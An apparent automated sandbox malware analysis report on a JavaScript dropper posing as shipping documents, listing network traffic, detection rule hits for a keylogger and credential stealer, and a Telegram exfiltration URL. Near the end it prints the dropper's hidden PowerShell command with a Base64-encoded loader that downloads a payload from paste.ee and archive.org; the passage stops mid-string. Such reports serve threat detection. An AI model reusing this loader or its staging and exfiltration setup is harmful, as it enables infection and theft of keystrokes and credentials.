0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FF88A8AB913h10_2_00007FF88A8AB8A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FF88A8AB913h10_2_00007FF88A8AB8B9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 026B9731h12_2_026B9480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 026B9E5Ah12_2_026B9A40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 026B9E5Ah12_2_026B9A30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 026B9E5Ah12_2_026B9D87

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.233.30:443 -> 192.168.2.6:49694
                      Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 23.186.113.60:443 -> 192.168.2.6:49695
                      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.186.113.60:443 -> 192.168.2.6:49695
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: paste.ee
                      Source: Shipping Documents SI 694_pdf.jsReturn value : ['"http://paste.ee/d/fa7OMk20/0"']Go to definition
                      Source: Shipping Documents SI 694_pdf.jsReturn value : [',send,', '"send"']Go to definition
                      Source: Shipping Documents SI 694_pdf.jsArgument value : ['"GET","http://paste.ee/d/fa7OMk20/0",false']Go to definition
                      Source: global trafficHTTP traffic detected: GET /d/xZVSQx4S/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.244.56.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                      Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
                      Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                      Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49686 -> 23.186.113.60:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49695 -> 23.186.113.60:443
                      Source: global trafficHTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /download/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /6/items/new_image_20250413/new_image.jpg HTTP/1.1User-Agent: Mozilla/5.0Host: ia801700.us.archive.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/xZVSQx4S/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/173.244.56.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /d/fa7OMk20/0 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                      Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: c.pki.goog
                      Source: global trafficDNS traffic detected: DNS query: archive.org
                      Source: global trafficDNS traffic detected: DNS query: ia801700.us.archive.org
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002876000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.org
                      Source: powershell.exe, 0000000A.00000002.1577845542.000001E8A9D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://archive.org/
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1577845542.000001E8A9D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://archive.org/download/new_image_20250413/new_image.jpg
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia801700.us.archive.org
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/xZVSQx4S/0
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.244.56.186d
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.244.56.186l
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                      Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49686 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.6:49693 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.6:49694 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49695 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                      System Summary

                      barindex
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Shipping Documents SI 694_pdf.jsStatic file information: Suspicious name
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0A